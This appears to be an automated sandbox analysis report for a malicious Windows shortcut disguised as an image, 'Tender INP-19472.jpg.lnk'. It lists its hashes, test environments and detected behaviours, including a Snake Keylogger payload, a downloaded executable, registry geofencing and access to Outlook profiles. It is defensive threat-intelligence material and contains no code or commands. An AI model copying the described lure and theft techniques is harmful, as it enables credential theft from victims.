General
-
Target
Tender INP-19472.jpg.lnk
-
Size
2KB
-
Sample
240131-mwnq1sccdn
-
MD5
c5b1207624c215d286c55e9c26b076a4
-
SHA1
511d995a0de5291d3da99232e9789d400c80a46d
-
SHA256
e2b2dd05d9052c5af5d376482346ceb7d01654fd395344ae59533a761c792749
-
SHA512
9a68741221022247f034a1104fe1f70d62e6e0e58ac6039dc992c689a1954721f778cb02e0eb7106f4de238619655c0accb5f4fa11a82efcb73d0b437fa3562a
Static task
static1
Behavioral task
behavioral1
Sample
Tender INP-19472.jpg.lnk
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Tender INP-19472.jpg.lnk
Resource
win10v2004-20231215-en
Malware Config
Targets
-
-
Target
Tender INP-19472.jpg.lnk
-
Size
2KB
-
MD5
c5b1207624c215d286c55e9c26b076a4
-
SHA1
511d995a0de5291d3da99232e9789d400c80a46d
-
SHA256
e2b2dd05d9052c5af5d376482346ceb7d01654fd395344ae59533a761c792749
-
SHA512
9a68741221022247f034a1104fe1f70d62e6e0e58ac6039dc992c689a1954721f778cb02e0eb7106f4de238619655c0accb5f4fa11a82efcb73d0b437fa3562a
Score10/10-
Snake Keylogger payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Accesses Microsoft Outlook profiles
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext
-